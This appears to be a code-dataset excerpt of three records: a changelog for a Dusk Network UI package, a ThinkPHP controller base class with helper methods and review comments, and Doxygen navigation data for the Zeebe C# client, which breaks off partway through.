- eeac67a4: Release 4.2.1
- Updated dependencies [eeac67a4]
- @dusk-network/icon@4.3.1
- @dusk-network/helpers@4.3.1
- @dusk-network/button@4.3.1
- @dusk-network/menu@4.3.1
## 4.3.0
### Minor Changes
- 7d390f05: Release 4.3.0
### Patch Changes
- Updated dependencies [7d390f05]
- @dusk-network/icon@4.3.0
- @dusk-network/helpers@4.3.0
- @dusk-network/button@4.3.0
- @dusk-network/menu@4.3.0
## 4.2.1
### Patch Changes
- b66edd71: Release 4.2.1
- Updated dependencies [b66edd71]
- @dusk-network/icon@4.2.1
- @dusk-network/helpers@4.2.1
- @dusk-network/button@4.2.1
- @dusk-network/menu@4.2.1
## 4.2.0
### Minor Changes
- 770e3502: Release 4.1.2
### Patch Changes
- Updated dependencies [770e3502]
- @dusk-network/icon@4.2.0
- @dusk-network/helpers@4.2.0
- @dusk-network/button@4.2.0
- @dusk-network/menu@4.2.0
## 4.1.1
### Patch Changes
- 03b53db4: Release 4.1.1
- Updated dependencies [03b53db4]
- @dusk-network/icon@4.1.1
- @dusk-network/helpers@4.1.1
- @dusk-network/button@4.1.1
- @dusk-network/menu@4.1.1
## 4.1.0
### Minor Changes
- b8dfbe58: Release 4.1.0
### Patch Changes
- Updated dependencies [b8dfbe58]
- @dusk-network/icon@4.1.0
- @dusk-network/helpers@4.1.0
- @dusk-network/button@4.1.0
- @dusk-network/menu@4.1.0
## 4.0.6
### Patch Changes
- 72ad415f: Release 4.0.6
- Updated dependencies [72ad415f]
- @dusk-network/icon@4.0.6
- @dusk-network/helpers@4.0.6
- @dusk-network/button@4.0.6
- @dusk-network/menu@4.0.6
## 4.0.5
### Patch Changes
- 2043c055: Release 4.0.4
- Updated dependencies [2043c055]
- @dusk-network/icon@4.0.5
- @dusk-network/helpers@4.0.5
- @dusk-network/button@4.0.5
- @dusk-network/menu@4.0.5
## 4.0.4
### Patch Changes
- 0f6d98e6: Release 4.0.4
- Updated dependencies [0f6d98e6]
- @dusk-network/icon@4.0.4
- @dusk-network/helpers@4.0.4
- @dusk-network/button@4.0.4
- @dusk-network/menu@4.0.4
## 4.0.3
### Patch Changes
- d0bfc346: Release v4.0.3
- Updated dependencies [d0bfc346]
- @dusk-network/icon@4.0.3
- @dusk-network/helpers@4.0.3
- @dusk-network/button@4.0.3
- @dusk-network/menu@4.0.3
## 4.0.2
### Patch Changes
- b7876f76: Releasing v4.0.2
- Updated dependencies [b7876f76]
- @dusk-network/icon@4.0.2
- @dusk-network/helpers@4.0.2
- @dusk-network/button@4.0.2
- @dusk-network/menu@4.0.2
## 4.0.1
### Patch Changes
- 3d02510e: Patch release for some boilerplate issues
- Updated dependencies [3d02510e]
- @dusk-network/icon@4.0.1
- @dusk-network/helpers@4.0.1
- @dusk-network/button@4.0.1
- @dusk-network/menu@4.0.1
## 4.0.0
### Major Changes
- 11a1f850: Release V4
### Minor Changes
- a86c725b: Updating all packages to node modules format
### Patch Changes
- Updated dependencies [11a1f850]
- Updated dependencies [a86c725b]
- @dusk-network/icon@4.0.0
- @dusk-network/helpers@4.0.0
- @dusk-network/button@4.0.0
- @dusk-network/menu@4.0.0
## 3.0.12
### Patch Changes
- 66d1852b: Minor fixes for search-list component
- Updated dependencies [66d1852b]
- @dusk-network/icon@3.0.12
- @dusk-network/helpers@3.0.12
- @dusk-network/button@3.0.12
- @dusk-network/menu@3.0.12
## 3.0.11
### Patch Changes
- e82126be: testing changesets
- Updated dependencies [e82126be]
- @dusk-network/icon@3.0.11
- @dusk-network/helpers@3.0.11
- @dusk-network/button@3.0.11
- @dusk-network/menu@3.0.11
## 3.0.10
### Patch Changes
- 3bdf6fcd: testing changesets
- Updated dependencies [3bdf6fcd]
- @dusk-network/icon@3.0.10
- @dusk-network/helpers@3.0.10
- @dusk-network/button@3.0.10
- @dusk-network/menu@3.0.10
## 3.0.9
### Patch Changes
- ddcc6129: testing changesets
- Updated dependencies [ddcc6129]
- @dusk-network/icon@3.0.9
- @dusk-network/helpers@3.0.9
- @dusk-network/button@3.0.9
- @dusk-network/menu@3.0.9
## 3.0.8
### Patch Changes
- 59509914: testing changesets
- 0258743d: testing changesets ci
- Updated dependencies [59509914]
- Updated dependencies [0258743d]
- @dusk-network/icon@3.0.8
- @dusk-network/helpers@3.0.8
- @dusk-network/button@3.0.8
- @dusk-network/menu@3.0.8
## 3.0.7
### Patch Changes
- 9fa40eb7: testing changesets
- Updated dependencies [9fa40eb7]
- @dusk-network/icon@3.0.7
- @dusk-network/helpers@3.0.7
- @dusk-network/button@3.0.7
- @dusk-network/menu@3.0.7
## 3.0.6
### Patch Changes
- dc22a3aa: testing changesets
- Updated dependencies [dc22a3aa]
- @dusk-network/icon@3.0.6
- @dusk-network/helpers@3.0.6
- @dusk-network/button@3.0.6
- @dusk-network/menu@3.0.6
## 3.0.5
### Patch Changes
- 006ffc63: testing changesets
- Updated dependencies [006ffc63]
- @dusk-network/icon@3.0.5
- @dusk-network/helpers@3.0.5
- @dusk-network/button@3.0.5
- @dusk-network/menu@3.0.5
## 3.0.4
### Patch Changes
- 83b76ba8: testing changesets
- Updated dependencies [83b76ba8]
- @dusk-network/icon@3.0.4
- @dusk-network/helpers@3.0.4
- @dusk-network/button@3.0.4
- @dusk-network/menu@3.0.4
## 3.0.3
### Patch Changes
- 365e4295: testing changesets
- Updated dependencies [365e4295]
- @dusk-network/icon@3.0.3
- @dusk-network/helpers@3.0.3
- @dusk-network/button@3.0.3
- @dusk-network/menu@3.0.3
## 3.0.2
### Patch Changes
- d9360f5c: testing changesets
- Updated dependencies [d9360f5c]
- @dusk-network/icon@3.0.2
- @dusk-network/helpers@3.0.2
- @dusk-network/button@3.0.2
- @dusk-network/menu@3.0.2
## 3.0.1
### Patch Changes
- ac84fdab: testing changesets
- 33c8fedb: testing changesets
- dd790adb: testing changesets
- Updated dependencies [ac84fdab]
- Updated dependencies [33c8fedb]
- Updated dependencies [dd790adb]
- @dusk-network/icon@3.0.1
- @dusk-network/helpers@3.0.1
- @dusk-network/button@3.0.1
- @dusk-network/menu@3.0.1
## 0.0.1
### Patch Changes
- a10ea514: testing changesets
- 2b3bda0b: testing changesets
- 6d417df2: adding another changeset
- Updated dependencies [a10ea514]
- Updated dependencies [2b3bda0b]
- Updated dependencies [6d417df2]
- @dusk-network/icon@0.0.1
- @dusk-network/helpers@0.0.1
- @dusk-network/button@0.0.1
- @dusk-network/menu@0.0.1
|
Markdown
|
MPL-2.0
|
dusk-network/dusk-ui-kit/packages/molecules/pagination/CHANGELOG.md
|
4446a1a8-e05e-4025-82cd-d8ffd7cc4349
|
[]
|
[]
|
<?php
// +----------------------------------------------------------------------
// | ThinkPHP [ WE CAN DO IT JUST THINK IT ]
// +----------------------------------------------------------------------
// | Copyright (c) 2006-2014 http://thinkphp.cn All rights reserved.
// +----------------------------------------------------------------------
// | Licensed ( http://www.apache.org/licenses/LICENSE-2.0 )
// +----------------------------------------------------------------------
// | Author: liu21st <liu21st@gmail.com>
// +----------------------------------------------------------------------
namespace Think;
/**
* ThinkPHP 控制器基类 抽象类
*/
abstract class Controller {
/**
 * Fetch all rows from $tablename where $keyname equals $key.
 *
 * @param string $tablename model/table name passed to M()
 * @param string $keyname   column to filter on
 * @param mixed  $key       value to match
 * @return mixed result set from Model::select()
 */
public function get_data($tablename,$keyname,$key)
{
    $obj=M($tablename);
    // Use an array condition so ThinkPHP escapes the value. The previous
    // version concatenated $key into raw SQL ($keyname.'="'.$key.'"'),
    // which was open to SQL injection for request-supplied values.
    $data=$obj->where(array($keyname => $key))->select();
    return $data;
}
/**
 * Validate and insert a record, then redirect with a success message.
 *
 * @param string $tablename          table name passed to M()
 * @param array  $data               row data to insert
 * @param string $redirectcontroller controller name to redirect to
 * @param string $redirectpage       action/page to redirect to
 * @param string $tips               success message
 * @return void (redirects or halts with an error page)
 */
public function write_db($tablename,$data,$redirectcontroller,$redirectpage,$tips)
{
    $obj=M($tablename);
    // Validate BEFORE inserting. The previous version called add() first
    // and only then create(), so invalid rows were written to the database
    // before the validation error was shown.
    if (!$obj->create($data)) {
        // Validation failed — show the error and stop.
        $this->error($obj->getError());
        exit();
    }
    $obj->data($data)->add();
    $this->success($tips,U($redirectcontroller.'/'.$redirectpage));
}
/**
 * Throttle helper for AJAX POSTs: return the number of seconds since the
 * previous POST (recorded in the session), updating the timestamp.
 * Returns 3 on the first call so the initial request is never blocked.
 *
 * @return int seconds elapsed since the last POST
 */
public function postLimit()
{
    // 'YmdHis' is quoted: the previous code used the bare constant YmdHis,
    // which only worked via PHP's deprecated undefined-constant fallback
    // (a notice before PHP 8, a fatal error from PHP 8 on).
    if(isset($_SESSION['postTime'])){
        $diff=strtotime(date('YmdHis'))-strtotime(I('session.postTime'));
        session('postTime',date('YmdHis'));
        return $diff;
    }else{
        session('postTime',date('YmdHis'));
        return 3;
    }
}
// User permission check failure handler: destroy the session and send the
// browser to the login page.
public function userauth()
{
    session(null);
    redirect(U('Login/index'));
}
/**
 * View (template engine) instance.
 * @var view
 * @access protected
 */
protected $view = null;
/**
 * Controller configuration parameters.
 * @var config
 * @access protected
 */
protected $config = array();
/**
 * Constructor: obtains the template engine instance.
 * @access public
 */
public function __construct() {
    // Fire the action_begin hook with the controller config.
    Hook::listen('action_begin',$this->config);
    // Instantiate the view (template engine) class.
    $this->view = Think::instance('Think\View');
    // Run the subclass initialization hook, if defined.
    if(method_exists($this,'_initialize'))
        $this->_initialize();
}
/**
 * Render a template via the built-in template engine.
 * @access protected
 * @param string $templateFile template to render; empty means the
 *        framework locates the template automatically
 * @param string $charset output charset
 * @param string $contentType output content type
 * @param string $content raw content to output instead of a template
 * @param string $prefix template cache prefix
 * @return void
 */
protected function display($templateFile='',$charset='',$contentType='',$content='',$prefix='') {
    $this->view->display($templateFile,$charset,$contentType,$content,$prefix);
}
/**
 * Output raw content (may contain HTML); the content is parsed by the
 * template engine.
 * @access protected
 * @param string $content content to output
 * @param string $charset output charset
 * @param string $contentType output content type
 * @param string $prefix template cache prefix
 * @return mixed
 */
protected function show($content,$charset='',$contentType='',$prefix='') {
    $this->view->display('',$charset,$contentType,$content,$prefix);
}
/**
 * Render a template and return the output instead of sending it.
 * @access protected
 * @param string $templateFile template to render; empty means the
 *        framework locates the template automatically
 * @param string $content raw template content
 * @param string $prefix template cache prefix
 * @return string
 */
protected function fetch($templateFile='',$content='',$prefix='') {
    return $this->view->fetch($templateFile,$content,$prefix);
}
/**
 * Render a template and write the result out as a static HTML file.
 * @access protected
 * @param string $htmlfile name of the generated static file
 * @param string $htmlpath output path; defaults to the HTML_PATH constant
 * @param string $templateFile template to render (empty = auto-locate)
 * @return string the rendered content
 */
protected function buildHtml($htmlfile='',$htmlpath='',$templateFile='') {
    $content = $this->fetch($templateFile);
    $htmlpath = !empty($htmlpath)?$htmlpath:HTML_PATH;
    // Final path: <path><file><suffix from the HTML_FILE_SUFFIX config>.
    $htmlfile = $htmlpath.$htmlfile.C('HTML_FILE_SUFFIX');
    Storage::put($htmlfile,$content,'html');
    return $content;
}
/**
 * Set the template theme.
 * @access protected
 * @param string $theme theme name
 * @return Action $this, for chaining
 */
protected function theme($theme){
    $this->view->theme($theme);
    return $this;
}
/**
 * Assign a template variable.
 * @access protected
 * @param mixed $name template variable name
 * @param mixed $value variable value
 * @return Action $this, for chaining
 */
protected function assign($name,$value='') {
    $this->view->assign($name,$value);
    return $this;
}
// Magic setter: $this->foo = $bar assigns the template variable 'foo'.
public function __set($name,$value) {
    $this->assign($name,$value);
}
/**
 * Get the value of an assigned template variable.
 * @access public
 * @param string $name template variable name
 * @return mixed
 */
public function get($name='') {
    return $this->view->get($name);
}
// Magic getter: $this->foo reads the template variable 'foo'.
public function __get($name) {
    return $this->get($name);
}
/**
 * Magic isset check for template variables.
 * NOTE(review): this returns the variable's value (coerced to bool by
 * isset()), not a strict boolean — falsy assigned values ('', 0, false)
 * therefore report as "not set". Confirm before relying on it.
 * @access public
 * @param string $name template variable name
 * @return boolean
 */
public function __isset($name) {
    return $this->get($name);
}
/**
 * Magic dispatcher invoked for undefined actions: when the missing method
 * matches the current action name, fall back to an _empty() handler or a
 * default template; otherwise raise a "method not exist" error.
 * @access public
 * @param string $method method name
 * @param array $args arguments
 * @return mixed
 */
public function __call($method,$args) {
    if( 0 === strcasecmp($method,ACTION_NAME.C('ACTION_SUFFIX'))) {
        if(method_exists($this,'_empty')) {
            // An _empty() handler is defined — delegate to it.
            $this->_empty($method,$args);
        }elseif(file_exists_case($this->view->parseTemplate())){
            // A default template exists — render it directly.
            $this->display();
        }else{
            E(L('_ERROR_ACTION_').':'.ACTION_NAME);
        }
    }else{
        E(__CLASS__.':'.$method.L('_METHOD_NOT_EXIST_'));
        return;
    }
}
/**
 * Shortcut for an error jump page (status 0).
 * @access protected
 * @param string $message error message
 * @param string $jumpUrl URL to jump to
 * @param mixed $ajax Ajax mode; an integer sets the jump delay in seconds
 * @return void
 */
protected function error($message='',$jumpUrl='',$ajax=false) {
    $this->dispatchJump($message,0,$jumpUrl,$ajax);
}
/**
 * Shortcut for a success jump page (status 1).
 * @access protected
 * @param string $message success message
 * @param string $jumpUrl URL to jump to
 * @param mixed $ajax Ajax mode; an integer sets the jump delay in seconds
 * @return void
 */
protected function success($message='',$jumpUrl='',$ajax=false) {
    $this->dispatchJump($message,1,$jumpUrl,$ajax);
}
/**
 * Return data to the client for an Ajax request and terminate the script
 * (except for the extension hook in the default branch).
 * @access protected
 * @param mixed $data data to return
 * @param String $type response format: JSON, XML, JSONP or EVAL
 * @param int $json_option options passed through to json_encode
 * @return void
 */
protected function ajaxReturn($data,$type='',$json_option=0) {
    if(empty($type)) $type = C('DEFAULT_AJAX_RETURN');
    switch (strtoupper($type)){
        case 'JSON' :
            // JSON response including status information.
            header('Content-Type:application/json; charset=utf-8');
            exit(json_encode($data,$json_option));
        case 'XML' :
            // XML response.
            header('Content-Type:text/xml; charset=utf-8');
            exit(xml_encode($data));
        case 'JSONP':
            // JSONP response; callback name from the request or config.
            header('Content-Type:application/json; charset=utf-8');
            $handler = isset($_GET[C('VAR_JSONP_HANDLER')]) ? $_GET[C('VAR_JSONP_HANDLER')] : C('DEFAULT_JSONP_HANDLER');
            exit($handler.'('.json_encode($data,$json_option).');');
        case 'EVAL' :
            // Executable JavaScript returned as-is.
            header('Content-Type:text/html; charset=utf-8');
            exit($data);
        default :
            // Extension point for other response formats.
            Hook::listen('ajax_return',$data);
    }
}
    /**
     * Action redirect (URL redirection), supporting module-qualified URL
     * expressions and delayed jumps.
     * @access protected
     * @param string $url URL expression to jump to (resolved by U())
     * @param array $params additional URL parameters
     * @param integer $delay delay before jumping, in seconds
     * @param string $msg message shown while waiting to jump
     * @return void
     */
    protected function redirect($url,$params=array(),$delay=0,$msg='') {
        // Build the concrete URL first, then delegate to the framework helper.
        $url = U($url,$params);
        redirect($url,$delay,$msg);
    }
    /**
     * Default jump handler, supporting both error and success redirection.
     * Renders the configured prompt template (by default the success/error page
     * under the public directory); the prompt page supports template tags.
     * For Ajax requests a JSON payload is returned instead of a template.
     * @param string $message prompt message
     * @param Boolean $status operation status (1 = success, 0 = failure)
     * @param string $jumpUrl URL to jump to
     * @param mixed $ajax whether this is an Ajax request; a number specifies the wait time in seconds
     * @access private
     * @return void
     */
    private function dispatchJump($message,$status=1,$jumpUrl='',$ajax=false) {
        if(true === $ajax || IS_AJAX) {// Ajax submission: reply with a status payload (ajaxReturn exits).
            $data = is_array($ajax)?$ajax:array();
            $data['info'] = $message;
            $data['status'] = $status;
            $data['url'] = $jumpUrl;
            $this->ajaxReturn($data);
        }
        if(is_int($ajax)) $this->assign('waitSecond',$ajax);
        if(!empty($jumpUrl)) $this->assign('jumpUrl',$jumpUrl);
        // Prompt title depends on the operation outcome.
        $this->assign('msgTitle',$status? L('_OPERATION_SUCCESS_') : L('_OPERATION_FAIL_'));
        // If closeWin is set, close the window automatically after the prompt.
        if($this->get('closeWin')) $this->assign('jumpUrl','javascript:window.close();');
        $this->assign('status',$status); // status
        // Disable the static cache so this output is not served from cache.
        C('HTML_CACHE_ON',false);
        if($status) { // success: send the success template
            $this->assign('message',$message);// prompt message
            // Default wait time after success (NOTE(review): the original comment
            // said 1 second but the assigned value is '3' — confirm intent).
            if(!isset($this->waitSecond)) $this->assign('waitSecond','3');
            // By default, return to the page the operation came from.
            // NOTE(review): HTTP_REFERER is client-supplied and may be absent — verify.
            if(!isset($this->jumpUrl)) $this->assign("jumpUrl",$_SERVER["HTTP_REFERER"]);
            $this->display(C('TMPL_ACTION_SUCCESS'));
        }else{
            $this->assign('error',$message);// prompt message
            // On error, wait 3 seconds by default.
            if(!isset($this->waitSecond)) $this->assign('waitSecond','3');
            // By default, go back to the previous page on error.
            if(!isset($this->jumpUrl)) $this->assign('jumpUrl',"javascript:history.back(-1);");
            $this->display(C('TMPL_ACTION_ERROR'));
            // Abort execution so nothing runs after the error page is emitted.
            exit ;
        }
    }
    /**
     * Destructor: fires the action_end behavior hook so registered listeners
     * can perform follow-up work when the controller is torn down.
     * @access public
     */
    public function __destruct() {
        // Run follow-up operations registered on the action_end hook.
        Hook::listen('action_end');
    }
}
// Register a controller class alias to ease upgrades from older versions
// that referenced Think\Action.
class_alias('Think\Controller','Think\Action');
|
PHP
|
Apache-2.0
|
roinheart/insurance/ThinkPHP/Library/Think/Controller.class.php
|
7aecfd34-1698-4cb3-8f3e-ddb86d9ec227
|
[{"tag": "USERNAME", "value": "liu21st", "start": 494, "end": 501, "context": "------------------------------------\n// | Author: liu21st <liu21st@gmail.com>\n// +-------------------------"}, {"tag": "EMAIL", "value": "liu21st@gmail.com", "start": 503, "end": 520, "context": "---------------------------\n// | Author: liu21st <liu21st@gmail.com>\n// +--------------------------------------------"}]
|
[{"tag": "USERNAME", "value": "liu21st", "start": 494, "end": 501, "context": "------------------------------------\n// | Author: liu21st <liu21st@gmail.com>\n// +-------------------------"}, {"tag": "EMAIL", "value": "liu21st@gmail.com", "start": 503, "end": 520, "context": "---------------------------\n// | Author: liu21st <liu21st@gmail.com>\n// +--------------------------------------------"}]
|
// Doxygen-generated navigation data for the Zeebe C# client documentation:
// a nested tree of [displayName, docPageUrl, children] triples covering the
// namespaces and interfaces of the API. Generated output — do not edit by hand.
var annotated_dup =
[
    [ "Zeebe", "d6/d18/namespaceZeebe.html", [
      [ "Client", "da/d88/namespaceZeebe_1_1Client.html", [
        [ "Api", "d5/df7/namespaceZeebe_1_1Client_1_1Api.html", [
          [ "Builder", "dc/d04/namespaceZeebe_1_1Client_1_1Api_1_1Builder.html", [
            [ "IAccessTokenSupplier", "d2/d24/interfaceZeebe_1_1Client_1_1Api_1_1Builder_1_1IAccessTokenSupplier.html", null ],
            [ "ICamundaCloudClientBuilder", "d7/d02/interfaceZeebe_1_1Client_1_1Api_1_1Builder_1_1ICamundaCloudClientBuilder.html", "d7/d02/interfaceZeebe_1_1Client_1_1Api_1_1Builder_1_1ICamundaCloudClientBuilder" ],
            [ "ICamundaCloudClientBuilderStep1", "d7/d12/interfaceZeebe_1_1Client_1_1Api_1_1Builder_1_1ICamundaCloudClientBuilderStep1.html", "d7/d12/interfaceZeebe_1_1Client_1_1Api_1_1Builder_1_1ICamundaCloudClientBuilderStep1" ],
            [ "ICamundaCloudClientBuilderStep2", "d9/d8a/interfaceZeebe_1_1Client_1_1Api_1_1Builder_1_1ICamundaCloudClientBuilderStep2.html", "d9/d8a/interfaceZeebe_1_1Client_1_1Api_1_1Builder_1_1ICamundaCloudClientBuilderStep2" ],
            [ "ICamundaCloudClientBuilderFinalStep", "d1/d61/interfaceZeebe_1_1Client_1_1Api_1_1Builder_1_1ICamundaCloudClientBuilderFinalStep.html", "d1/d61/interfaceZeebe_1_1Client_1_1Api_1_1Builder_1_1ICamundaCloudClientBuilderFinalStep" ],
            [ "ICamundaCloudTokenProviderBuilder", "d3/d08/interfaceZeebe_1_1Client_1_1Api_1_1Builder_1_1ICamundaCloudTokenProviderBuilder.html", "d3/d08/interfaceZeebe_1_1Client_1_1Api_1_1Builder_1_1ICamundaCloudTokenProviderBuilder" ],
            [ "ICamundaCloudTokenProviderBuilderStep2", "de/db1/interfaceZeebe_1_1Client_1_1Api_1_1Builder_1_1ICamundaCloudTokenProviderBuilderStep2.html", "de/db1/interfaceZeebe_1_1Client_1_1Api_1_1Builder_1_1ICamundaCloudTokenProviderBuilderStep2" ],
            [ "ICamundaCloudTokenProviderBuilderStep3", "d8/d4e/interfaceZeebe_1_1Client_1_1Api_1_1Builder_1_1ICamundaCloudTokenProviderBuilderStep3.html", "d8/d4e/interfaceZeebe_1_1Client_1_1Api_1_1Builder_1_1ICamundaCloudTokenProviderBuilderStep3" ],
            [ "ICamundaCloudTokenProviderBuilderStep4", "da/d5d/interfaceZeebe_1_1Client_1_1Api_1_1Builder_1_1ICamundaCloudTokenProviderBuilderStep4.html", "da/d5d/interfaceZeebe_1_1Client_1_1Api_1_1Builder_1_1ICamundaCloudTokenProviderBuilderStep4" ],
            [ "ICamundaCloudTokenProviderBuilderFinalStep", "d6/dd9/interfaceZeebe_1_1Client_1_1Api_1_1Builder_1_1ICamundaCloudTokenProviderBuilderFinalStep.html", "d6/dd9/interfaceZeebe_1_1Client_1_1Api_1_1Builder_1_1ICamundaCloudTokenProviderBuilderFinalStep" ],
            [ "IZeebeClientBuilder", "d2/d7d/interfaceZeebe_1_1Client_1_1Api_1_1Builder_1_1IZeebeClientBuilder.html", "d2/d7d/interfaceZeebe_1_1Client_1_1Api_1_1Builder_1_1IZeebeClientBuilder" ],
            [ "IZeebeClientTransportBuilder", "d2/df5/interfaceZeebe_1_1Client_1_1Api_1_1Builder_1_1IZeebeClientTransportBuilder.html", "d2/df5/interfaceZeebe_1_1Client_1_1Api_1_1Builder_1_1IZeebeClientTransportBuilder" ],
            [ "IZeebeSecureClientBuilder", "d6/d64/interfaceZeebe_1_1Client_1_1Api_1_1Builder_1_1IZeebeSecureClientBuilder.html", "d6/d64/interfaceZeebe_1_1Client_1_1Api_1_1Builder_1_1IZeebeSecureClientBuilder" ],
            [ "IZeebeClientFinalBuildStep", "d6/d2b/interfaceZeebe_1_1Client_1_1Api_1_1Builder_1_1IZeebeClientFinalBuildStep.html", "d6/d2b/interfaceZeebe_1_1Client_1_1Api_1_1Builder_1_1IZeebeClientFinalBuildStep" ]
          ] ],
          [ "Commands", "d9/def/namespaceZeebe_1_1Client_1_1Api_1_1Commands.html", [
            [ "IActivateJobsCommandStep1", "d4/d1d/interfaceZeebe_1_1Client_1_1Api_1_1Commands_1_1IActivateJobsCommandStep1.html", "d4/d1d/interfaceZeebe_1_1Client_1_1Api_1_1Commands_1_1IActivateJobsCommandStep1" ],
            [ "IActivateJobsCommandStep2", "d0/d9e/interfaceZeebe_1_1Client_1_1Api_1_1Commands_1_1IActivateJobsCommandStep2.html", "d0/d9e/interfaceZeebe_1_1Client_1_1Api_1_1Commands_1_1IActivateJobsCommandStep2" ],
            [ "IActivateJobsCommandStep3", "df/d94/interfaceZeebe_1_1Client_1_1Api_1_1Commands_1_1IActivateJobsCommandStep3.html", "df/d94/interfaceZeebe_1_1Client_1_1Api_1_1Commands_1_1IActivateJobsCommandStep3" ],
            [ "ICancelProcessInstanceCommandStep1", "d5/d79/interfaceZeebe_1_1Client_1_1Api_1_1Commands_1_1ICancelProcessInstanceCommandStep1.html", null ],
            [ "ICompleteJobCommandStep1", "d2/d53/interfaceZeebe_1_1Client_1_1Api_1_1Commands_1_1ICompleteJobCommandStep1.html", "d2/d53/interfaceZeebe_1_1Client_1_1Api_1_1Commands_1_1ICompleteJobCommandStep1" ],
            [ "ICreateProcessInstanceCommandStep1", "dc/db3/interfaceZeebe_1_1Client_1_1Api_1_1Commands_1_1ICreateProcessInstanceCommandStep1.html", "dc/db3/interfaceZeebe_1_1Client_1_1Api_1_1Commands_1_1ICreateProcessInstanceCommandStep1" ],
            [ "ICreateProcessInstanceCommandStep2", "df/d4a/interfaceZeebe_1_1Client_1_1Api_1_1Commands_1_1ICreateProcessInstanceCommandStep2.html", "df/d4a/interfaceZeebe_1_1Client_1_1Api_1_1Commands_1_1ICreateProcessInstanceCommandStep2" ],
            [ "ICreateProcessInstanceCommandStep3", "d0/db3/interfaceZeebe_1_1Client_1_1Api_1_1Commands_1_1ICreateProcessInstanceCommandStep3.html", "d0/db3/interfaceZeebe_1_1Client_1_1Api_1_1Commands_1_1ICreateProcessInstanceCommandStep3" ],
            [ "ICreateProcessInstanceWithResultCommandStep1", "dd/dd6/interfaceZeebe_1_1Client_1_1Api_1_1Commands_1_1ICreateProcessInstanceWithResultCommandStep1.html", "dd/dd6/interfaceZeebe_1_1Client_1_1Api_1_1Commands_1_1ICreateProcessInstanceWithResultCommandStep1" ],
            [ "IDeployProcessCommandStep1", "d6/db0/interfaceZeebe_1_1Client_1_1Api_1_1Commands_1_1IDeployProcessCommandStep1.html", "d6/db0/interfaceZeebe_1_1Client_1_1Api_1_1Commands_1_1IDeployProcessCommandStep1" ],
            [ "IDeployProcessCommandBuilderStep2", "da/d46/interfaceZeebe_1_1Client_1_1Api_1_1Commands_1_1IDeployProcessCommandBuilderStep2.html", null ],
            [ "IFailJobCommandStep1", "d9/de4/interfaceZeebe_1_1Client_1_1Api_1_1Commands_1_1IFailJobCommandStep1.html", "d9/de4/interfaceZeebe_1_1Client_1_1Api_1_1Commands_1_1IFailJobCommandStep1" ],
            [ "IFailJobCommandStep2", "d5/d66/interfaceZeebe_1_1Client_1_1Api_1_1Commands_1_1IFailJobCommandStep2.html", "d5/d66/interfaceZeebe_1_1Client_1_1Api_1_1Commands_1_1IFailJobCommandStep2" ],
            [ "IFinalCommandStep", "d2/de4/interfaceZeebe_1_1Client_1_1Api_1_1Commands_1_1IFinalCommandStep.html", "d2/de4/interfaceZeebe_1_1Client_1_1Api_1_1Commands_1_1IFinalCommandStep" ],
            [ "IFinalCommandWithRetryStep", "d5/d5e/interfaceZeebe_1_1Client_1_1Api_1_1Commands_1_1IFinalCommandWithRetryStep.html", "d5/d5e/interfaceZeebe_1_1Client_1_1Api_1_1Commands_1_1IFinalCommandWithRetryStep" ],
            [ "IPublishMessageCommandStep1", "d8/d8d/interfaceZeebe_1_1Client_1_1Api_1_1Commands_1_1IPublishMessageCommandStep1.html", "d8/d8d/interfaceZeebe_1_1Client_1_1Api_1_1Commands_1_1IPublishMessageCommandStep1" ],
            [ "IPublishMessageCommandStep2", "d9/d49/interfaceZeebe_1_1Client_1_1Api_1_1Commands_1_1IPublishMessageCommandStep2.html", "d9/d49/interfaceZeebe_1_1Client_1_1Api_1_1Commands_1_1IPublishMessageCommandStep2" ],
            [ "IPublishMessageCommandStep3", "d5/d02/interfaceZeebe_1_1Client_1_1Api_1_1Commands_1_1IPublishMessageCommandStep3.html", "d5/d02/interfaceZeebe_1_1Client_1_1Api_1_1Commands_1_1IPublishMessageCommandStep3" ],
            [ "IResolveIncidentCommandStep1", "d0/d39/interfaceZeebe_1_1Client_1_1Api_1_1Commands_1_1IResolveIncidentCommandStep1.html", null ],
            [ "ISetVariablesCommandStep1", "d2/d5d/interfaceZeebe_1_1Client_1_1Api_1_1Commands_1_1ISetVariablesCommandStep1.html", "d2/d5d/interfaceZeebe_1_1Client_1_1Api_1_1Commands_1_1ISetVariablesCommandStep1" ],
            [ "ISetVariablesCommandStep2", "de/de4/interfaceZeebe_1_1Client_1_1Api_1_1Commands_1_1ISetVariablesCommandStep2.html", "de/de4/interfaceZeebe_1_1Client_1_1Api_1_1Commands_1_1ISetVariablesCommandStep2" ],
            [ "IThrowErrorCommandStep1", "d4/d22/interfaceZeebe_1_1Client_1_1Api_1_1Commands_1_1IThrowErrorCommandStep1.html", "d4/d22/interfaceZeebe_1_1Client_1_1Api_1_1Commands_1_1IThrowErrorCommandStep1" ],
            [ "IThrowErrorCommandStep2", "d3/d85/interfaceZeebe_1_1Client_1_1Api_1_1Commands_1_1IThrowErrorCommandStep2.html", "d3/d85/interfaceZeebe_1_1Client_1_1Api_1_1Commands_1_1IThrowErrorCommandStep2" ],
            [ "ITopologyRequestStep1", "d5/dae/interfaceZeebe_1_1Client_1_1Api_1_1Commands_1_1ITopologyRequestStep1.html", null ],
            [ "IUpdateRetriesCommandStep1", "da/d9d/interfaceZeebe_1_1Client_1_1Api_1_1Commands_1_1IUpdateRetriesCommandStep1.html", "da/d9d/interfaceZeebe_1_1Client_1_1Api_1_1Commands_1_1IUpdateRetriesCommandStep1" ],
            [ "IUpdateRetriesCommandStep2", "dd/dec/interfaceZeebe_1_1Client_1_1Api_1_1Commands_1_1IUpdateRetriesCommandStep2.html", null ]
          ] ],
          [ "Misc", "de/df7/namespaceZeebe_1_1Client_1_1Api_1_1Misc.html", [
            [ "IAsyncRetryStrategy", "de/d82/interfaceZeebe_1_1Client_1_1Api_1_1Misc_1_1IAsyncRetryStrategy.html", "de/d82/interfaceZeebe_1_1Client_1_1Api_1_1Misc_1_1IAsyncRetryStrategy" ]
          ] ],
          [ "Responses", "dd/db3/namespaceZeebe_1_1Client_1_1Api_1_1Responses.html", [
            [ "IActivateJobsResponse", "d5/d31/interfaceZeebe_1_1Client_1_1Api_1_1Responses_1_1IActivateJobsResponse.html", "d5/d31/interfaceZeebe_1_1Client_1_1Api_1_1Responses_1_1IActivateJobsResponse" ],
            [ "IBrokerInfo", "d7/dce/interfaceZeebe_1_1Client_1_1Api_1_1Responses_1_1IBrokerInfo.html", "d7/dce/interfaceZeebe_1_1Client_1_1Api_1_1Responses_1_1IBrokerInfo" ],
            [ "ICancelProcessInstanceResponse", "d9/d27/interfaceZeebe_1_1Client_1_1Api_1_1Responses_1_1ICancelProcessInstanceResponse.html", null ],
